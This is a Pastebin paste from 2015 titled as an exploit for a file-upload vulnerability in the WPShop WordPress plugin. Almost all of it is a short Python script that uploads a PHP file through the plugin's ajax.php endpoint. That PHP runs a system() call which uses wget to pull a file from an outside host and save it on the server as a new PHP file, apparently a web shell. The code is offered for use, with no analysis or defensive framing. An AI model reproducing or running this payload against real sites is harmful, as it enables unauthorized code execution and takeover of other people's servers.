jackwilder

Exploit Wordpress Plugins WPShop File Upload Vulnerability

May 18th, 2015
1,147
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import requests
  2. from StringIO import StringIO
  3. s = requests.session()
  4. target = 'http://localhost/'
  5.  
  6. url = '%s/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload'%target
  7. files = {
  8.  "wpshop_file":("out.php",StringIO("<?php system('wget http://yuyudhn1337.org/exp/priv.txt -O njepat.php');"))
  9. }
  10. r = s.post(url, files=files)
  11.  
  12. print r.text
RAW Paste Data